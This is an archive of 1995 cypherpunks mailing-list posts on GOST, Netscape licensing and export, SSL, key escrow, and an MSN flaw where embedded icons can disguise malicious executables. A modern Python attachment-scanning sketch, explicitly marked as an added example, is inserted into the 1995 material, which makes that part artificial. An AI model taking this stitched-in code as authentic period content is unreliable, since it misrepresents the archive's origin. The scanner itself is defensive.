Message-ID: <Pine.LNX.3.91.950819232149.13352A-100000@lightlink.satcom.net>
MIME-Version: 1.0
Content-Type: text/plain


        Does anyone know what the legal status of the Russian cypher
"GOST" is ?  Is it public domain, patented, proprietary or what ?  It
looks like it would be more efficient than DES when implemented on a
microprocessor or microcontroller.
 
	Also the DDJ article mentioned that like DES, there are good and
bad S-boxes for GOST.  Does anyone know how to choose a strong S-box for
GOST ?
 
	Jim Prickett





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rosaphil <rugosa@escape.com>
Date: Sat, 19 Aug 95 23:41:05 PDT
To: Anonymous <nobody@REPLAY.COM>
Subject: Re: Red Shift
In-Reply-To: <199508190140.DAA01774@utopia.hacktic.nl>
Message-ID: <Pine.BSD/.3.91.950820022737.6411C-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



	any mericans involved?

	could someone please post the jeopardy questions posed
	in the game played at cybercon?

	also, anyone know how to hack axxess passwords?

	just curious?

	



             (Better Living Thru Better Living)                    
***************************************************************************
*        SNAIL ME             +      GABRIELLI'S  *ZINFANDEL*  (RED) &    *
*      YER ROSEHIPS           +                                           *
*  IF YOU LIKED THIS POST!    +     *ASCENZA*  (WHITE-BLEND)---YUMMY!     *
***************************************************************************
               [Ask Fer  *Gabrielli Wine*  at 
		yer local liquor store if'n ya
		want to tend yer rugosa]


	Let your voice be heard in the campaign to save the life of
	 		     Mumia Abu Jamal

               ++++ stop de execution of Mumia Abu-Jamal ++++
       ++++ if you agree copy these 3 sentences in your own sig ++++
     ++++ more info: http://www.xs4all.nl/tank/spg-l/sigaction.htm ++++






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 19 Aug 95 23:42:50 PDT
To: cypherpunks@toad.com
Subject: Netscape to copyright URLs?
Message-ID: <199508200639.CAA03066@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Today's surf of Netscape's home page yielded an interesting question. Is
Netscape trying to licence links to their products? To me
http://home.netscape.com/comprod/mirror/netscape_now_program.html seems to
suggest that you can only display certain logos and info if you are
licensed by Netscape. You could for example not put up a link to their
"Download Netscape NOW" page without prior approval by Netscape.

This seems to be a new development on the web. Since when does one need a
license to include certain URLs in one's home page?

Comments?

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDbYcCoZzwIn1bdtAQHE1gF/WoY8jEAv16lL1pGylJKp4MZnVsKYRfMe
SzgQcpGouFnT6Ij+zwlS7dkuudQIJyvX
=b88z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 19 Aug 95 23:51:07 PDT
To: cypherpunks@toad.com
Subject: Would it be legal for a foreign site to carry Netscape?
Message-ID: <199508200647.CAA03141@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If someone would export the full 128 bit version of Netscape, would it be
legal to make it available on a foreign site? After all, Netscape is a
copyrighted product.

TIA,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDbaNioZzwIn1bdtAQEb/gF+JJ9e3FqwEwIboLX7ISW6X4QWjcO6QCkt
gMuEghppSrv2G2sPmzyDzOoweTlglfi/
=Y7nR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sat, 19 Aug 95 20:05:41 PDT
To: cypherpunks@toad.com
Subject: Re: Spooks and Hackers, etc.
Message-ID: <199508200305.AA18530@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Brad Dolan sez:

: ---------- Forwarded message ----------
: Subject: Internet Police

: According to an AP story, Wisconsin Attorney General James Doyle says that
: police must monitor the Internet to stop child porn, drug trafficking, and
: fraud.

: "We need to see that police are surfing the Internet just as other people
: are," Doyle said. "This is a good example of where the law is slower than
: technology."

"Stop Wisconsin Internet Police" "You're speeding" 

  "Get Lost" "Get Real"

--
Alex de Joode
Fear Uncertainty Confusion and Kaos, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Murray slIP <sdavidm@iconz.co.nz>
Date: Sat, 19 Aug 95 14:45:22 PDT
To: cypherpunks@toad.com
Subject: The greater socio-economic good
Message-ID: <199508192145.JAA09259@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


I came acreossoss this in the july Law UPdate of Phillips Fox,
an Auastralasionan law firm. This edition was entitled 'Your money
or your E-cash', and hasd a section entitled 'Privacy' which said/says:

At the moment, your cahsh transactions cannot be recorded in the same
way as your cheque, credit cards or Eftpos spending. This means that
your cash spending cannot be readily traced, checked, investigated or
analysed. The big excitement for banks, marketing consultants and
governments is being able to do all these things. On the other hand, toatally
untraceable e-cash will enable huge amounts of money to be moved (laundered)
outside the bankiongng systyeem. Consumers will need to make a 
decision whether they want untraceable e-cash, or to contribute to the
greater socio-economic good.

I think they're being serious?

DM




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Sun, 20 Aug 95 07:50:27 PDT
To: cypherpunks@toad.com
Subject: Re: Would it be legal for a foreign site to carry Netscape?
In-Reply-To: <199508200647.CAA03141@bb.hks.net>
Message-ID: <m0skBUq-000wP1C@myriad>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green <shamrock@netcom.com> asked:
> If someone would export the full 128 bit version of Netscape, would
> it be legal to make it available on a foreign site? After all, Netscape
> is a copyrighted product.

It would depend on what the license agreement said.

But why not just write a wrapper which strips out the 88 bits of plaintext
key?  (A "leaf blower" if you like:)  If you could get the author of slirp
to include it in his distribution, it would definitely get used.  All you
would have to say is "This is a patch to ensure that netscape encryption
is properly secure when using slirp, and here are the diffs..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 20 Aug 95 10:51:44 PDT
To: Andrew Spring <Andrew.Spring@ping.be>
Subject: Re: NSA into antigravity?
In-Reply-To: <v01510101ac5d1e46d09f@[193.74.217.8]>
Message-ID: <Pine.SUN.3.91.950820103443.29900A-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 20 Aug 1995, Andrew Spring wrote:

> Missile targeting software depends on good models of the earth's gravity
> for accuracy, both for design and for simulation purposes. . .

Not so much a model as an exact map of earth's gravity field.
Twenty years ago, I was friends with a scientist who had worked
for the US government some years before that.  He sailed around
the North Atlantic in a ship that contained extremely sensitive
gravity measuring devices.  He was mapping masscons on the ocean
floor so that their effect on intercontinental ballistic missiles
could be taken into account when targeting the missiles.

The equipment was sensitive enough to measure the gravity
gradient between sea level and altitude of a meter or two.  Since
the ship on which he sailed regularly experienced swells of that
magnitude or greater, other equipment was used to measure the
swells and to mathematically cancel out their effect.  Cool.

I can see why the folks at Ft. Meade would be hinkie about such
measurements being made around them.  No need to hypothesize
micro-singularities or anti-gravity experiments.  Occam's Razor
in action.


 S a n d y

 Who must secretly work for the NSA's disinformation department.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harveyrj@vt.edu (R. J. Harvey)
Date: Sun, 20 Aug 95 08:11:41 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape to copyright URLs?
Message-ID: <9508201511.AA06361@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:39 AM 8/20/95 -0400, Lucky Green wrote:
>Today's surf of Netscape's home page yielded an interesting question. Is
>Netscape trying to licence links to their products? To me
>http://home.netscape.com/comprod/mirror/netscape_now_program.html seems to
>suggest that you can only display certain logos and info if you are
>licensed by Netscape. You could for example not put up a link to their
>"Download Netscape NOW" page without prior approval by Netscape.
>
>This seems to be a new development on the web. Since when does one need a
>license to include certain URLs in one's home page?
>
>Comments?
>
  My reading of that page suggests a somewhat different motive
and interpretation:  what they seem to be doing is copying the
Microsoft approach with respect to setting criteria that must be
met before you can use their logo on your page/product.  It doesn't 
prohibit putting links to their download page; it just prohibits
using their "Netscape Now!" logo without their permission.
  Note the criteria for being allowed to use their logo:  you
have to design your server to break with the current "standards"
(e.g., CGI) and embrace Netscape's extensions (e.g., backgrounds;
client pull/server push, SSL encrypted transactions), which they 
would like to foist on us as the new "standard."
  Essentially, they want us to help them create the perception
that if you don't show the "Netscape Now!" flag (didn't Nixon have
a similar slogan?) on your page, that you're just not a high-
quality operation.  Or maybe they're trying to change the subject
from the unfortunate publicity from the success of SSL Challenge...

rj

------------------------------------------------------------
R. J. Harvey               email:  harveyrj@vt.edu
WWW for job analysis/personality:  http://harvey.psyc.vt.edu/
PGP key at http://harvey.psyc.vt.edu/RJsPGPkey.txt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 20 Aug 95 12:19:48 PDT
To: cypherpunks@toad.com
Subject: Re: MSN hackers heaven (fwd)
Message-ID: <199508201919.MAA20699@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain



>The bottom line: Users of MSN are placing themselves at significant risk.
>If one must use MSN, avoid at all cost activating (double-clicking) objects
>in e-mail messages and BBS posts.  Sophisticated users may think they know
>what they are doing, but it probably won't be long before they are outwitted
>by someone who figures out how to totally disguise an object's true purpose.

It is just Microsoft's way of guaranteeing "good times" for all. ];>

(It's a cheap shot, but someone has to take it.)
|        What mime type is Marcell Marceu?        | alano@teleport.com   |
|"Would you rather be tortured by the government  | Disclaimer:          |
|forces or the people's liberation army?" -mklprc | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 20 Aug 95 10:03:33 PDT
To: cypherpunks@toad.com
Subject: MSN hackers heaven (fwd)
Message-ID: <Pine.SOL.3.91.950820125605.17569B@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------

Subject: The MSN is Hacker Heaven


As most of us are aware, the commercial online services, such as AOL,
Compuserve and Prodigy, represent certain risk to the unsophisticated user.
Unfortunately, the Microsoft Network (MSN) raises the vulnerability of such
users to unprecedented heights.

Key to this vulnerability is the richness and complexity of the MSN/Windows
95 environment.  What is most dangerous is the ability for the author of an
e-mail or (certain) BBS documents to embed "objects" in that document. These
objects can be readily disguised to appear totally benign to the casual user
and be nothing more than MSN navigational aids.  Once double-clicked by the
recipient, these objects can readily infect the recipient's PC with a virus.
Worse, what this object could do is only limited by one's imagination.  It
is worthwhile noting that MSN appears to be migrating to an open
architecture, with the MSN user connecting through the Internet.  If this is
true, there is nothing which prevents an object, once activated, from
transmitting information stored on the user's PC to any other location on
the Internet.

In theory, embedded objects can be interrogated to ensure their validity.
Unfortunately, this interrogation process is not likely to be carried out by
the average user.  Even if it is, the user is not likely to understand what
they are looking at.  It is like warning automobile drivers to look under
the hood of their car before starting it to make sure there is not a bomb
inside.  Most drivers would assume that the odds were with them.  Those that
did check would have no idea what they were looking at.  (At least that's my
feeling when I look under the hood of my car :-).

Microsoft's position appears to be that the MSN user is no more vulnerable
than one who uses a competing system.  I would maintain that this position
is just not true.  With system complexity comes excessive vulnerability.
MSN rates a 9 in complexity.  The other services a 4.

The bottom line: Users of MSN are placing themselves at significant risk.
If one must use MSN, avoid at all cost activating (double-clicking) objects
in e-mail messages and BBS posts.  Sophisticated users may think they know
what they are doing, but it probably won't be long before they are outwitted
by someone who figures out how to totally disguise an object's true purpose.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 20 Aug 95 12:58:17 PDT
To: cypherpunks@toad.com
Subject: Re: NSA into antigravity?
Message-ID: <ac5ce06c020210044231@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(No, I see no relevance for "coding in C," but even critics of "off-topic"
posts have commented on this, so I will too, especially as how physics was
my old career and in 1974 I interviewed with a Santa Barbara company doing
ICBM geogravitic trajectory work.)

At 5:50 PM 8/20/95, Sandy Sandfort wrote:

>I can see why the folks at Ft. Meade would be hinkie about such
>measurements being made around them.  No need to hypothesize
>micro-singularities or anti-gravity experiments.  Occam's Razor
>in action.

I can't. At least not with regard to microgravity measurements. If you mean
missile trajectory stuff, this is extremely implausible. A missile
targeted at Fort Meade is not going to be deflected by more than a few
centimeters (if that much) by nearby variations...the missile is moving
very fast and there's little "integration time" for slight errors in
trajectory to build up. (Also, but related to this, the closing trajectory
is near vertical, so it's doubly hard to imagine local g-field anomalies
affecting the point of impact.)

As to what the folks were doing with their equipment, I have no idea. Maybe
measuring water tables in and around the Chesapeake Bay (only a few miles
from the Fort). The NSA people probably were upset with the equipment
itself, not the idea that Meade was being more precisely targeted for
ICBMs.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 20 Aug 95 11:58:23 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: NSA into antigravity?
In-Reply-To: <v01510101ac5d1e46d09f@[193.74.217.8]>
Message-ID: <199508201857.OAA03000@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Andrew Spring writes:
> Missile targeting software depends on good models of the earth's gravity
> for accuracy, both for design and for simulation purposes.  Since Ft. Meade
> was doubtless the target of many nukes during the cold war (and probably
> still is), that may account for them having a bug up their asses on the
> subject.

More likely if you were working for the NSA and some people were
driving about your place with expensive electronic monitoring
equipment you would get nervous, too, until you knew precisely what
they were doing.

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 20 Aug 95 12:13:42 PDT
To: cypherpunks@toad.com
Subject: A glance at the future of missing child identification
Message-ID: <199508201909.PAA07003@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

We all read the stories. "Infant stolen from crib in Hospital", "Thousands
of children abducted every year". Many parents would jump at the anything
that might increase the chance of recovering their children should they be
abducted. Just take a look at lines during "Child Fingerprint Days" at you
local mall.

The solution? Transponder implants at birth. Modern transponders can be
injected into an infant where they grow into the tissue, unable to be
removed without major surgery. If schools make implants a requirenment,
such as vaccinations are today, children can be routinely scanned when
entering kindergarden. Later in life, the same transponders can be used to
verify legal age for obtaining a driver license or purchasing alcohol. 
The transpoders also provide ID for the ATMs and credit card termials of
the future. No criminal can loot your account. You can leave the ATM card
at home. How convenient! 

How do you prevent the dead from voting? Simple. One transponder, one vote.

Even better, childmolesters, individuals out on bail or parole, and other
"security risks" can be similarily tagged to prevent escape from US
jurisdiction.  A combination metal detector/scanner for airport and border
use is just one of the obvious ideas to increase the value of this
technology.

For an example of such a transponder see
http://www.dfw.net/~tqg/eid/tx1400l.html

I predict that you will see the first such implants in children within
five years. An enterprising Cypherpunk who has become disillusiond that
the statists can be stopped could make a fortune by offering a "Children's
Safety Identification Service." 

Any idea if offering such a service would require an M.D. or only a R.N.?
Perhaps even a cosmetology licesnse would suffice, since "body piercers"
do similar insertions every day.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDeIayoZzwIn1bdtAQFo3QGAzU13qIy4qIeKQ7F13JtmnRE4Oo4AsXpt
RktLZfE/8K8EauRuisl/MxU23oMkTgD0
=Vm+o
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lindsay Haisley <fmouse@fmp.com>
Date: Sun, 20 Aug 95 13:50:44 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Netscape to copyright URLs?
Message-ID: <199508202050.PAA19345@zoom.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:39 AM 8/20/95 -0400, you wrote:
>Today's surf of Netscape's home page yielded an interesting question. Is
>Netscape trying to licence links to their products? To me
>http://home.netscape.com/comprod/mirror/netscape_now_program.html seems to
>suggest that you can only display certain logos and info if you are
>licensed by Netscape. You could for example not put up a link to their
>"Download Netscape NOW" page without prior approval by Netscape.
>
>This seems to be a new development on the web. Since when does one need a
>license to include certain URLs in one's home page?

The Netscape general info document specifically states ....

>Aside from the ftp mirrors we list on our home page, we do not allow
>redistribution of our software.  This means that it is not legal to put
>our software on your ftp server, nor to include it on disks you are
>distributing, although you're more than welcome to include a pointer to
>our home pages so that people can download the latest version for
>themselves. 

They have specifically given permission here for links, at least to their
home pages, possibly even to other items such as a downloadable netscape.


                                  (______)
Lindsay Haisley                     (oo)        "The bull 
FMP Computer Services         /------\/            stops here!"
fmouse@fmp.com               / |    ||  
Austin, Texas, USA          *  ||---||
(512) 259-1190                 ~~   ~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 20 Aug 95 13:03:19 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: NSA into antigravity?
In-Reply-To: <ac5ce06c020210044231@[205.199.118.202]>
Message-ID: <199508202002.QAA03115@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> 
> (No, I see no relevance for "coding in C," but even critics of "off-topic"
> posts have commented on this,

Because it isn't off topic. It was small and reasonably on-topic. So
are discussions of personal privacy, clipper, electronic cash, NSA
procedure, and similar stuff. It's the long conspiracy theory rants
about Waco that are pure noise.

Furthermore, Tim, no one ever suggested that coding in C was the only
possible way people could contribute to the efforts we are
making. Popularization, lobbying, legal work, are all important.

It was the constant stream of posts about militias, Vincent Foster's
shoe size, and the like, which we were flaming.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 20 Aug 95 13:12:42 PDT
To: cypherpunks@toad.com
Subject: MSN hackers heaven (fwd)
Message-ID: <199508202012.QAA26057@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   This is a variation on Brad's forward of the MSN security
   hole:

   Information Week, August 28, 1995, p. 24.


   Risk Looms On Microsoft Network. E-mail icons can hide
   viruses.


   A feature designed to make electronic mail easy to use on
   the Microsoft Network online service may also make it
   easier for hackers to trick users into running destructive
   software programs on their PCs.

   When a Microsoft Network user sends a binary file embedded
   in an E-mail message, the file appears as an icon on the
   recipient's screen. The recipient can double-click on the
   icon to automatically download the embedded file and
   execute it. To download the file without executing it, the
   recipient must use the mouse's right button, which has been
   rarely needed until now.

   Though other online services offer automatic downloading of
   files, Microsoft's goes one step further in allowing the
   file's automatic execution. That file could be a virus or
   other malicious program that could erase files or reformat
   a hard disk, according to Mike Wyman, VP and chief
   technical officer of Interactive Data Corp., an investment
   information firm in Lexington, Mass., and a Microsoft
   Network beta user. "On the Microsoft Network, I can
   disguise an icon so that it looks innocuous," says Wyman.
   "The analogy I like to use is the Unabomber. If you get a
   package in the mail that's wrapped in duct tape and brown
   paper, you'd regard it as suspicious. But if it's a plain
   white envelope with Ed McMahon's picture on it, you
   wouldn't think twice about opening it."

   Microsoft says the feature is a convenience, not a security
   hole. "There are risks of getting [data] off the network in
   any form," says George Meng, group product manager for the
   Microsoft Network in Redmond, Wash. "People have to be
   aware of what the source of information is."

   Winn Schwartau, president of Interpact Inc., a computer
   security consulting firm in Seminole, Fla., disagrees. "If
   the ability to execute programs bypasses conventional
   filtering and virus controls, then you certainly have a
   security hole," he says. "Potential 'Trojan horse' programs
   could be sent by anyone."

   By Mitch Wagner and Clinton Wilder

   [End]
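
The risk the article describes, an embedded file whose icon or name does not match what it really is, can be checked at a mail gateway by reading the content's leading bytes instead of trusting its label. The sketch below is an added example, not part of the article or of any Microsoft software; it generalizes from MSN mail to ordinary MIME mail, and the sample message, file names and the pass/quarantine/block policy are constructed assumptions.

```python
import email
import email.policy
from email.message import EmailMessage
from pathlib import PurePosixPath

# Leading bytes of formats that run, or can carry code, when opened.
MAGIC = [
    (b"MZ", "DOS/Windows executable"),
    (b"\x7fELF", "ELF executable"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound document"),
    (b"#!", "script with interpreter line"),
]

# Extensions that honestly announce "this will execute".
EXECUTABLE_EXTENSIONS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd"}

# Declared MIME main types a user would consider harmless to open.
BENIGN_MAIN_TYPES = {"image", "text", "audio", "video"}


def sniff(payload: bytes):
    """Return a label if the payload starts like executable content, else None."""
    for magic, label in MAGIC:
        if payload.startswith(magic):
            return label
    return None


def inspect_message(raw: bytes):
    """Classify every attachment by what it is, not by what it claims to be."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        declared = part.get_content_type()
        payload = part.get_payload(decode=True) or b""
        sniffed = sniff(payload)
        suffix = PurePosixPath(name).suffix.lower()

        if sniffed is None:
            verdict = "pass"
        elif (suffix not in EXECUTABLE_EXTENSIONS
              or declared.split("/")[0] in BENIGN_MAIN_TYPES):
            # Executable content behind a harmless-looking label:
            # the disguised-object case the article warns about.
            verdict = "block"
        else:
            # Honestly labelled executable: hold it for virus scanning.
            verdict = "quarantine"

        findings.append({
            "filename": name,
            "declared": declared,
            "sniffed": sniffed,
            "verdict": verdict,
        })
    return findings


def build_sample() -> bytes:
    """Constructed test message: one real image, one disguised and one
    honestly labelled executable. Payloads are inert header stubs."""
    msg = EmailMessage()
    msg["From"] = "sender@example.org"
    msg["To"] = "recipient@example.org"
    msg["Subject"] = "constructed sample"
    msg.set_content("See attached.")
    msg.add_attachment(b"GIF89a" + b"\x00" * 16,
                       maintype="image", subtype="gif", filename="photo.gif")
    msg.add_attachment(b"MZ" + b"\x00" * 62,
                       maintype="image", subtype="gif", filename="navigate.gif")
    msg.add_attachment(b"MZ" + b"\x00" * 62,
                       maintype="application", subtype="octet-stream",
                       filename="setup.exe")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in inspect_message(build_sample()):
        print(finding)
```
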












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Sun, 20 Aug 95 17:41:11 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Netscape to copyright URLs?
Message-ID: <8AF83E3.000300034C.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


RJ>   Essentially, they want us to help them create the perception
RJ> that if you don't show the "Netscape Now!" flag (didn't Nixon have
RJ> a similar slogan?) on your page, that you're just not a high-
RJ> quality operation.  Or maybe they're trying to change the subject

  Let's just create our own flag, and use it instead, then.


 * If we had ham,
 * We could have ham and eggs,
 * If we had eggs.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 20 Aug 95 14:10:51 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Another SSL breakage...
In-Reply-To: <7849.9508171510@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.D-G.3.91.950820165648.14336E-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 17 Aug 1995 aba@dcs.exeter.ac.uk wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> All hell seems to have broken loose whilst I was lazing on the beach
> yesterday.  SSL breakings, big name newspaper newsreports (of varying
> degrees of accuracy), and much ITAR bashing (yay!) or perhaps that
> should be nooooh! 'cos I might be doing myself out of work as a UK
> crypto hacker (as John Hemming said in the article Robert Hettinga
> forwarded) if we lose the fun advantage of being in the free world,
> and not having to follow the ITAR nonsense.
> 
> Anyway, congratulations Damien!

I add my congratulations to everyone else's.  But, as the list rejoices 
that this means the "end of ITAR" or, more accurately put the "end of 
encryption programs as 'munitions'", I've got to play the devil's advocate.
Many of you, of course, see me as the Devil's Advocate.  

Anyway, certain arms of the government want to prevent strong crypto from 
being exported so that they can easily decode encrypted messages from 
abroad (at least those using US developed software).  Damien's impressive 
feat is that exportation of weak crypto indeed makes that possible.  Some 
posters have discussed the time and difficulty in decoding strong crypto 
... I think all agree that it would take significantly longer (or much 
more computer time) but is not impossible.

So ... has this proven that the banning of strong crypto is the correct 
way to go, and that, at least to some, credit card transactions using 
weak crypto will be acceptable to most (given the ease of getting CC#s 
other ways)?

Donning my asbestos suit,
And speaking only for myself ...

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 20 Aug 95 14:24:33 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Non-News Govt Announcement on Key Escrow
In-Reply-To: <ac595a311502100481c2@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.950820171326.14336F-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 17 Aug 1995, Timothy C. May wrote:

> At 9:49 PM 8/17/95, Dave Banisar wrote:
> >The White House and NIST announced today that they were planning to hold two
> >open meetings next month to develop standards for "acceptable" software key
> >escrow.  The standards will then be made into a FIPS. The programs cannot
> >deletia
> One thing I'm hoping for is that Clinton will, as he contemplates his last
> year and a bit in office, have an attack of "liberalism." That is, I am
> hoping he realizes that any mandatory key escrow system is not only a
> massive infringement on the right of people to speak and communicate as
> they wish, it is also handing the keys to the Surveillance State to the
> likes of Bob Dole, Jesse Helms, Alfonse D'Amato, Newt Gingrich, and William
> Bennett.
>
I'm afraid your hope is misplaced; I'm sure he thinks he's got a fighting 
chance for a second term.  And giving up on GAK would be portrayed by the 
Republican right (I know, that's redundant) as being weak on crime.  Not 
gonna happen.

If he's reelected, then you've cause to be hopeful on this and other 
issues ...

 
> --Tim May
> 
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May            | Crypto Anarchy: encryption, digital money,
> tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 20 Aug 95 14:21:05 PDT
To: bdavis@thepoint.net (Brian Davis)
Subject: Re: Another SSL breakage...
In-Reply-To: <Pine.D-G.3.91.950820165648.14336E-100000@dg.thepoint.net>
Message-ID: <199508202119.RAA12053@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| So ... has this proven that the banning of strong crypto is the correct 
| way to go, and that, at least to some, credit card transactions using 
| weak crypto will be acceptable to most (given the ease of getting CC#s 
| other ways)?

	No.  Banning strong crypto will not help; those darn furriners
are using it anyway.  What it will mean is that the Information
Infrastructure of the future will bypass the United States, as without
strong cryptography, it is impossible to build a secure architecture.

	Should the United States wish to relegate itself to the status
of a third world nation because of terrorists, drug dealers, child
pornographers and money launderers, that is indeed unfortunate.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sun, 20 Aug 95 09:27:56 PDT
To: cypherpunks@toad.com
Subject: Re: NSA into antigravity?
Message-ID: <v01510101ac5d1e46d09f@[193.74.217.8]>
MIME-Version: 1.0
Content-Type: text/plain



:
>>
>>On July 19, Gerald Ollman and Robert Wayne, two researchers from the
>>University of Maryland geophysics department were detained in Fort Meade,
>>Maryland, apparently by agents of the National Security Agency, whilst
>>taking measurements of the Earth's gravitational field. After 18 hours of
>>questioning, they were released after being instructed not to discuss the
>>incident. Their equipment and results were not returned.
>>
>>Neither the University nor the NSA has commented on the incident. However,
>>it is believed that Ollman and Wayne were investigating a slight anomaly
>>in the Earth's gravitational field centered around Fort Meade. No reason has
>>been given for their detention.

Missile targeting software depends on good models of the earth's gravity
for accuracy, both for design and for simulation purposes.  Since Ft. Meade
was doubtless the target of many nukes during the cold war (and probably
still is), that may account for them having a bug up their asses on the
subject.

'Course you know the NSA;  the world's largest employer of mathematicians,
the largest purchaser of computer hardware, and the largest consumer of
Thorazine.

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
